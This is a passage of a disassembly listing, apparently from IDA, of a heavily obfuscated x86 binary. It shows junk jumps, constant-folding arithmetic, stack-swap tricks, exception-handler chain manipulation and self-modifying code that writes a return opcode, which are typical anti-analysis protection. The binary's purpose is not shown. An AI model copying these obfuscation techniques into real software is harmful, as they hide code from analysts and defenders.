jmp nullsub_11
; END OF FUNCTION CHUNK FOR sub_448DD9
; =============== S U B R O U T I N E =======================================
sub_43CDBA proc near ; CODE XREF: ut7h7i2x:0043D124j
; sub_4448AF-26p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004422FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044281C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00442E3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F20 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044883D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044DCDD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00456748 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A85B SIZE 0000001F BYTES
xchg ebx, [esp+0]
pop ebx
xchg esi, [esp-4+arg_0]
mov ecx, ebp
call sub_457836
loc_43CDC8: ; CODE XREF: sub_43C413+1E556j
jmp loc_44281C
sub_43CDBA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_379. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_43CDCE: ; CODE XREF: sub_43F66D+Bj
jmp loc_44FB8B
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43CDD3: ; CODE XREF: sub_44D1F0:loc_457EB1j
ja loc_454302
jmp loc_44864D
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_43CDDE: ; CODE XREF: ut7h7i2x:00447218j
jz loc_4489AE
jmp loc_446D1D
; ---------------------------------------------------------------------------
loc_43CDE9: ; DATA XREF: sub_44EC28-E9BAo
mov [edx], eax
pop edx
push offset sub_44F20C
jmp locret_44D85A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A92F
loc_43CDF6: ; CODE XREF: sub_43A92F+D74Ej
add eax, 0F314C73h
mov eax, [eax]
popf
mov al, [eax]
jmp loc_4554B3
; END OF FUNCTION CHUNK FOR sub_43A92F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_43CE07: ; CODE XREF: sub_44941C-D4D8j
jmp loc_439507
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_43CE0C: ; CODE XREF: sub_43F0B0-4E7Bj
jmp loc_4403B1
; END OF FUNCTION CHUNK FOR sub_43F0B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BB85
loc_43CE12: ; CODE XREF: sub_43BB85+8j
jmp loc_459F7E
; END OF FUNCTION CHUNK FOR sub_43BB85
; ---------------------------------------------------------------------------
loc_43CE17: ; CODE XREF: ut7h7i2x:0045A8BAj
jb loc_44C914
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43CE1D: ; CODE XREF: sub_450FDE+9644j
xor edx, 85F9482Dh
xor eax, edx
pop edx
loc_43CE26: ; CODE XREF: ut7h7i2x:loc_442F3Dj
push esi
push 89F1AA9h
xchg edx, [esp+0]
jmp loc_43E5EB
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_43CE34 proc near ; CODE XREF: sub_4573BA+Ap
; ut7h7i2x:00459F09j
; FUNCTION CHUNK AT 0043BB6F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043CA75 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CEE8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D90A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EC99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F665 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440326 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442766 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044301D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443ACE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004446AA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004458AA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446137 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C8BB SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044CF84 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004537C1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00453925 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454D5B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004564F9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004580D5 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
mov eax, [eax]
test eax, 70h
jz loc_44C8BB
jmp loc_44301D
sub_43CE34 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 179794F1h
jmp sub_45114D
; ---------------------------------------------------------------------------
db 0Fh, 8Ah, 0FFh
; ---------------------------------------------------------------------------
pop ebp
add [eax], eax
xor ecx, 4951262Ah
loc_43CE61: ; CODE XREF: ut7h7i2x:00443A3Fj
add ecx, 508EE51Ah
rol ecx, 1
xor ecx, 463F52C5h
add ecx, 0C36B113Eh
jmp loc_43F7AA
; ---------------------------------------------------------------------------
loc_43CE7A: ; DATA XREF: ut7h7i2x:004597C4o
call sub_44B8F8
mov ds:dword_43E350, eax
call sub_453D8B
mov edx, 0A2CD59D9h
jmp loc_451E30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43CE93: ; CODE XREF: sub_43CCC3+E300j
xchg eax, edx
jbe loc_44C767
cmp ecx, 0E9BF6EC2h
jmp loc_444BFA
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
jge loc_44AED5
jmp loc_45137B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_43CEB1: ; CODE XREF: sub_453E14+661Cj
jnb loc_451CE6
jns nullsub_416
popf
jmp loc_455F28
; ---------------------------------------------------------------------------
loc_43CEC3: ; CODE XREF: sub_453E14:loc_450896j
cmp dword ptr [ebp-20h], 0
jge loc_444E40
jmp loc_454E01
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
loc_43CED2: ; CODE XREF: ut7h7i2x:loc_43DCCCj
push ecx
mov ecx, edx
xchg ecx, [esp]
call sub_44A833
jmp loc_4496B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B58
loc_43CEE3: ; CODE XREF: sub_439B58+11C68j
jmp nullsub_510
; END OF FUNCTION CHUNK FOR sub_439B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43CEE8: ; CODE XREF: ut7h7i2x:0043BB6Aj
; sub_43CE34-12C0j ...
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
loc_43CEF3: ; CODE XREF: ut7h7i2x:0045494Bj
jmp loc_45712C
; =============== S U B R O U T I N E =======================================
sub_43CEF8 proc near ; CODE XREF: sub_449FF0:loc_44E291p
; sub_449FF0:loc_450BD5j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043962C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A47A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C812 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045388E SIZE 00000005 BYTES
push large dword ptr fs:0
mov large fs:0, esp
call sub_439D5C
loc_43CF0B: ; CODE XREF: sub_43AD46+1Cj
jmp loc_44A47A
sub_43CEF8 endp
; ---------------------------------------------------------------------------
loc_43CF10: ; CODE XREF: ut7h7i2x:00453E71j
pushf
; START OF FUNCTION CHUNK FOR sub_44A030
loc_43CF11: ; CODE XREF: sub_44A030+1C5Ej
add esi, 9C4D35Dh
xchg esi, [esp+8+var_8]
jmp nullsub_502
; END OF FUNCTION CHUNK FOR sub_44A030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43CF1F: ; CODE XREF: ut7h7i2x:loc_4496ACj
; sub_455060+2EA5j
; DATA XREF: ...
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
mov eax, edx
nop
; END OF FUNCTION CHUNK FOR sub_455060
; START OF FUNCTION CHUNK FOR sub_4572E0
loc_43CF28: ; CODE XREF: sub_4572E0+Aj
mov eax, [esp+0]
call sub_454196
jmp nullsub_288
; END OF FUNCTION CHUNK FOR sub_4572E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43CF35: ; CODE XREF: sub_43AB62:loc_44D3D5j
jnz loc_451CB7
jmp loc_45685D
; END OF FUNCTION CHUNK FOR sub_43AB62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_316. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43CF41: ; DATA XREF: sub_44D169+7o
push 73D948C0h
pop edx
xor edx, 0EABA5C14h
add edx, 0A995446Dh
jmp loc_440C30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43CF58: ; CODE XREF: ut7h7i2x:0043B3F5j
; sub_44C791+7DB4j
sub esi, 0B200588h
add esi, 0F46BE681h
xchg esi, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
loc_43CF6C: ; CODE XREF: ut7h7i2x:loc_456339j
pop edi
rol edi, 4
and edi, 1483CB7Ch
add edi, 45E50610h
add edi, ebp
jmp loc_43EC21
; ---------------------------------------------------------------------------
loc_43CF83: ; DATA XREF: sub_43B9C8+8o
add esi, 0C7D97EC5h
xchg esi, [esp]
jmp sub_454196
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4411BF
loc_43CF91: ; CODE XREF: sub_4411BF+D80Cj
and edx, 45DACD6Bh
mov eax, edx
loc_43CF99: ; CODE XREF: ut7h7i2x:loc_444518j
jnb loc_445088
sbb ecx, ebx
jmp loc_446E04
; END OF FUNCTION CHUNK FOR sub_4411BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_43CFA6: ; CODE XREF: sub_43F7B6+Dj
push offset loc_458618
jmp loc_43D578
; END OF FUNCTION CHUNK FOR sub_43F7B6
; ---------------------------------------------------------------------------
locret_43CFB0: ; CODE XREF: ut7h7i2x:0043AA1Cj
retn
; ---------------------------------------------------------------------------
loc_43CFB1: ; CODE XREF: ut7h7i2x:0043D724j
jmp loc_440980
; =============== S U B R O U T I N E =======================================
sub_43CFB6 proc near ; CODE XREF: ut7h7i2x:004452F7j
; sub_4544E6-1466p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B421 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440750 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004415BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004437F3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EB53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F4B4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045200A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456AE7 SIZE 00000032 BYTES
xchg esi, [esp+0]
pop esi
call sub_4456C9
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_44F4B4
mov eax, [ebp-4]
xor edx, edx
jmp loc_456AE7
sub_43CFB6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_43CFD6: ; CODE XREF: sub_44825D:loc_43C8F6j
or edx, 41223838h
xor edx, 0F778FAEBh
add edx, ebp
add edx, 4730F9A6h
mov edx, [edx]
imul byte ptr [edx]
push offset loc_44148D
jmp nullsub_145
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B52
loc_43CFF8: ; CODE XREF: sub_440B52:loc_43DAD8j
call sub_44ED9F
push ebx
push 943716D2h
pop ebx
and ebx, 859BD7FAh
xor ebx, 0B2EA4065h
sub ebx, 48096FF9h
xor ebx, 0F52C1D2Ah
jmp loc_450B9A
; END OF FUNCTION CHUNK FOR sub_440B52
; =============== S U B R O U T I N E =======================================
sub_43D021 proc near ; DATA XREF: sub_444273-26A1o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B61C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C939 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CBD1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EA28 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043ED1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F280 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F39D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F8BC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FAE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF20 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004402F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442DE7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004431D3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444418 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444811 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444F86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004453D1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044935C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044968C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449CF4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449F1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF09 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CA1A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044CDA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D1C9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F6F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004518FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004529D9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045372F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045397A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455715 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456997 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004570A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457B44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457E12 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0045AB9C SIZE 00000010 BYTES
or eax, eax
jnz loc_43C939
jmp loc_43FF20
sub_43D021 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_43D02E: ; CODE XREF: sub_43EDD8+17894j
not esi
loc_43D030: ; CODE XREF: sub_43EDD8:loc_447B17j
push 8A232DD0h
xchg ebp, [esp+4+var_4]
mov eax, ebp
pop ebp
and eax, 86D0386Ah
jmp loc_43B9AC
; END OF FUNCTION CHUNK FOR sub_43EDD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457565
loc_43D046: ; CODE XREF: sub_457565+Cj
push 155E39Bh
mov eax, [edi]
jmp loc_449DD8
; END OF FUNCTION CHUNK FOR sub_457565
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4504EC
loc_43D052: ; CODE XREF: sub_4504EC+7j
xchg ebp, [esp+0]
push 0C7D549Dh
xchg edx, [esp+4+var_4]
mov ecx, edx
; END OF FUNCTION CHUNK FOR sub_4504EC
; START OF FUNCTION CHUNK FOR sub_45292B
loc_43D05F: ; CODE XREF: sub_45292B:loc_4583ABj
pop edx
rol ecx, 3
jnb loc_452EDD
; END OF FUNCTION CHUNK FOR sub_45292B
; START OF FUNCTION CHUNK FOR sub_446320
loc_43D069: ; CODE XREF: sub_446320+2571j
jmp loc_447020
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
loc_43D06E: ; CODE XREF: ut7h7i2x:004475C7j
jmp loc_4455B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43D073: ; CODE XREF: sub_44D1F0-89B4j
jmp loc_4411B3
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_43D078: ; CODE XREF: ut7h7i2x:0045414Bj
jl loc_456283
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_43D07E: ; CODE XREF: sub_43C0DA:loc_454203j
; ut7h7i2x:loc_45850Aj
rol ecx, 1Eh
test ecx, 100000h
jmp loc_448938
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_43D08C: ; CODE XREF: sub_459B58-C4EEj
jz loc_441266
jmp loc_459F9D
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_43D097: ; CODE XREF: sub_445E9E-5929j
mov edx, [ebp-4]
imul byte ptr [edx]
call sub_44AA54
loc_43D0A1: ; CODE XREF: ut7h7i2x:00458AF0j
jmp sub_449C6F
; END OF FUNCTION CHUNK FOR sub_445E9E
; ---------------------------------------------------------------------------
loc_43D0A6: ; CODE XREF: ut7h7i2x:0043A2C9j
jmp loc_450928
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_435. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43D0AC: ; CODE XREF: ut7h7i2x:00458991j
mov ebx, eax
xchg ebp, [esp]
mov eax, ebp
pop ebp
pop ebp
jmp loc_452047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444BAE
loc_43D0BA: ; CODE XREF: sub_444BAE:loc_444CC2j
xor edx, 13AABD58h
not edx
call sub_43DCB8
loc_43D0C7: ; CODE XREF: ut7h7i2x:0044C6F7j
jmp nullsub_56
; END OF FUNCTION CHUNK FOR sub_444BAE
; ---------------------------------------------------------------------------
loc_43D0CC: ; CODE XREF: ut7h7i2x:0044D960j
xor eax, 0F2C6A113h
and eax, 97532FD3h
xor eax, 345A0EF2h
add esi, eax
jmp loc_44DBDB
; ---------------------------------------------------------------------------
or esi, 7C412A55h
jmp loc_44AA4E
; ---------------------------------------------------------------------------
pushf
jmp sub_44EA6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_43D0F6: ; CODE XREF: sub_4519D2:loc_4552DCj
pop ebx
pop ecx
pop eax
xchg eax, [esp-0Ch+arg_8]
mov edx, eax
pop eax
jmp loc_44FDAE
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_43D104: ; CODE XREF: sub_439701+8D51j
sub esi, 7210868Dh
rol esi, 16h
sub esi, 0A20142EFh
rol esi, 1Ch
add esi, 7454519Dh
popf
jmp loc_454EA4
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
sub edx, edi
jmp sub_43CDBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_43D129: ; CODE XREF: sub_441765-27B0j
mov eax, [esp-4+arg_0]
push esi
mov esi, edx
xchg esi, [esp+0]
jmp loc_447FAC
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_43D137: ; CODE XREF: sub_4529E0-8F83j
pop esi
lea eax, nullsub_9
mov byte ptr [eax], 0C3h
jmp nullsub_9
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_43D146: ; CODE XREF: ut7h7i2x:00444001j
mov eax, [esp]
push edx
push edx
jmp loc_43D431
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B98B
loc_43D150: ; CODE XREF: sub_44B98B-96B5j
xor edx, 85F8850Ah
call sub_4563CB
loc_43D15B: ; CODE XREF: ut7h7i2x:00453771j
jmp loc_44D044
; END OF FUNCTION CHUNK FOR sub_44B98B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_43D160: ; CODE XREF: sub_459E54-552j
rol ecx, 1Ah
add ecx, 785F5187h
add edx, ecx
pop ecx
mov [edx], eax
pop edx
; END OF FUNCTION CHUNK FOR sub_459E54
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_43D16F: ; CODE XREF: sub_43CB0D+12j
; sub_43BE93+111C8j ...
dec ds:dword_443780
mov eax, [ebp-4]
jmp loc_454319
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
loc_43D17D: ; CODE XREF: ut7h7i2x:004488BEj
mov ebp, ebx
; =============== S U B R O U T I N E =======================================
sub_43D17F proc near ; CODE XREF: sub_44427E+1p
; FUNCTION CHUNK AT 0043CB3A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443228 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F46 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00453A3C SIZE 0000001E BYTES
xchg eax, [esp+0]
pop eax
push 0BA628F7Bh
pop esi
jmp loc_443228
sub_43D17F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444D26
loc_43D18E: ; CODE XREF: sub_444D26-AAACj
jnz loc_453BF0
; END OF FUNCTION CHUNK FOR sub_444D26
; START OF FUNCTION CHUNK FOR sub_444029
loc_43D194: ; CODE XREF: sub_444029-1B5Cj
jmp loc_445D9A
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
cmp edx, eax
jmp loc_457728
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_43D1A0: ; CODE XREF: sub_443A65-2084j
mov edx, ecx
and ecx, edi
jmp loc_43F660
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
loc_43D1A9: ; CODE XREF: ut7h7i2x:00450545j
shl esi, 10h
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_43D1AC: ; CODE XREF: sub_445AD1:loc_450534j
add ecx, 4F35Fh
cmp ecx, 82DB0327h
jmp loc_442E88
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_43D1BD: ; CODE XREF: ut7h7i2x:0045874Aj
add edx, 0D6C0782Dh
popf
xchg edx, [esp]
jmp loc_43F78E
; ---------------------------------------------------------------------------
mov edx, 20413B0Fh
push ebx
push offset sub_4445E4
jmp loc_44B260
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_43D1DC: ; CODE XREF: sub_4396F5:loc_45A718j
call sub_456FB3
loc_43D1E1: ; CODE XREF: ut7h7i2x:loc_442EACj
jnz loc_454170
jmp loc_44EEE7
; END OF FUNCTION CHUNK FOR sub_4396F5
; ---------------------------------------------------------------------------
loc_43D1EC: ; DATA XREF: sub_43FCEE+5C90o
cmp byte ptr [eax], 0F1h
jnz loc_43D9D7
jmp loc_44CD18
; ---------------------------------------------------------------------------
push 9269F645h
pop edx
or edx, 4A9C6C8h
test edx, 400000h
jmp loc_445153
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43D211: ; CODE XREF: sub_439BF8+10EE7j
ror edi, 12h
test edi, ebx
jmp loc_446A0A
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_43D21B: ; CODE XREF: sub_441765:loc_4568E8j
jnz loc_44328D
jmp loc_44DF27
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
pushf
jmp loc_43E9C8
; ---------------------------------------------------------------------------
loc_43D22C: ; DATA XREF: ut7h7i2x:00447A22o
push 0A821F3D9h
pop ebx
sub ebx, 7B2D3034h
cmp ebx, 3887237Fh
jmp loc_44FFD3
; ---------------------------------------------------------------------------
mov edx, 1F56AC7Bh
push offset loc_441708
jmp loc_4504E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_43D252: ; CODE XREF: ut7h7i2x:004478E7j
; sub_4417AF+15D7Ej
sub eax, ecx
; END OF FUNCTION CHUNK FOR sub_4417AF
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43D254: ; CODE XREF: sub_45A79F-20778j
; sub_4417AF-777Aj ...
jmp loc_43B2AA
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_43D259: ; CODE XREF: ut7h7i2x:00443052j
; sub_4417AF+D092j
push offset loc_449D29
jmp loc_43DD72
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457BC2
loc_43D263: ; CODE XREF: sub_457BC2+19j
push offset sub_44B1E7
jmp nullsub_549
; END OF FUNCTION CHUNK FOR sub_457BC2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_280. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test edi, ebp
jmp loc_43B20F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_43D276: ; CODE XREF: sub_4489DF+E07Bj
jmp loc_45878E
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_43D27B: ; CODE XREF: sub_45292B+842Bj
jnz loc_45AD3A
jmp loc_45625C
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
loc_43D286: ; CODE XREF: ut7h7i2x:loc_43AB83j
jz loc_44CD53
jmp loc_44ED49
; ---------------------------------------------------------------------------
mov [ecx], ebp
jmp sub_43ECFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_43D298: ; CODE XREF: sub_440CEC+428Fj
jg loc_44EB22
loc_43D29E: ; CODE XREF: sub_440CEC:loc_450F00j
mov ecx, [ebp-20h]
push ebx
push 0C5013D0Ah
pop ebx
add ebx, 2A3C4045h
sub ebx, 0B919CF91h
jmp loc_4556E8
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_43D2B9: ; CODE XREF: sub_45341C-12165j
jnz loc_44AA22
jmp loc_44541C
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
loc_43D2C4: ; CODE XREF: ut7h7i2x:0045170Fj
jl loc_44F0D8
add edi, 8FBD54C5h
and ebp, 5941EFC4h
jmp loc_44F0D2
; ---------------------------------------------------------------------------
loc_43D2DB: ; CODE XREF: ut7h7i2x:004556A1j
js loc_446463
mov [esi], edx
jmp loc_45323A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AC59
loc_43D2E8: ; CODE XREF: sub_45AC59:loc_43A048j
add edx, 0FA055157h
popf
xchg edx, [esp+0]
jmp sub_45854D
; END OF FUNCTION CHUNK FOR sub_45AC59
; =============== S U B R O U T I N E =======================================
sub_43D2F7 proc near ; CODE XREF: ut7h7i2x:00444EF6j
; sub_442B3B+A4ADp
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg eax, [esp-4+arg_0]
jmp sub_43F058
sub_43D2F7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455597
loc_43D303: ; CODE XREF: sub_455597:loc_444E81j
jnz loc_44AEDD
not ecx
mov ebx, 29B70773h
xor ebp, edx
popf
jmp loc_44AEDD
; END OF FUNCTION CHUNK FOR sub_455597
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447185
loc_43D318: ; CODE XREF: sub_447185-5D99j
; sub_447185-5D87j
and edi, 25515D3Bh
push offset loc_44A6FF
jmp loc_442EA3
; END OF FUNCTION CHUNK FOR sub_447185
; ---------------------------------------------------------------------------
loc_43D328: ; DATA XREF: sub_43CD2F+9A1Co
add eax, 35A126A5h
push offset sub_458AFD
jmp loc_44A3A1
; ---------------------------------------------------------------------------
mov ebp, edx
jmp sub_439B67
; ---------------------------------------------------------------------------
loc_43D33F: ; CODE XREF: ut7h7i2x:loc_44EE48j
jz loc_440D3E
loc_43D345: ; CODE XREF: ut7h7i2x:0045A235j
jmp sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
